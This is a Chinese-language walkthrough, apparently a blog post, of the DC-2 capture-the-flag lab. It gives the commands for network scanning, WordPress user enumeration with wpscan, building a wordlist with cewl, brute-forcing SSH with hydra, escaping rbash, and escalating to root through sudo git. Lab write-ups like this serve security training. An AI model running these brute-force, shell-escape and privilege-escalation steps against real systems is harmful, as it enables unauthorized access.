DC-2

DC-2

先扫描当前网段下的ip确定靶机。

nmap -sP 192.168.93.0/24

扫描靶机开放的端口

nmap -sV 192.168.93.152

发现开放80端口,用浏览器进行访问

发现ip地址被直接转成了dc-2,而且无法访问,页面显示无法解析出ip地址

进入kali下的/etc/hosts,在末尾加上192.168.93.152 dc-2即可。

再次访问页面,可以正常访问。

拿到flag1

在这里插入图片描述

这里再次用nmap进行扫描

nmap -sS -Pn -A -p 1-65535 192.168.239.152

发现还扫出来一个7744端口,运行了ssh服务。

flag1提示cewl,同时wordpress也是一种框架,可以寻找相关工具。

wpscan --url http://dc-2 --enumerate u#扫描关于wordpress的相关漏洞

在这里插入图片描述

发现了三个用户。

但并不知道密码,这里查询cewl用法,使用cewl生成密码。

cewl -w 555.txt http://dc-2

再将用户写入txt文件,开始准备爆破ssh用户。

hydra -L 444.txt -P 555.txt ssh://192.168.239.152 -s 7744 -vV指定7744端口ssh爆破用户名和密码,不过这个只能爆破出tom的密码,下面那个还可以爆出jerry的。
wpscan --url http://dc-2/ -e u -U 444.txt -P 555.txt #这个也能爆。

登陆tom用户:

ssh tom@192.168.239.152 -p 7744

发现是rbash,部分命令受限,绕过rbash

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
ls
cat flag3.txt

在这里插入图片描述

su jerry
cd /home/jerry
ls
cat flag4.txt

根据提示联想git提权

sudo -l#查看sudo配置文件
sudo git help config#git提权
cd /root
ls
cat final-flag.txt

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值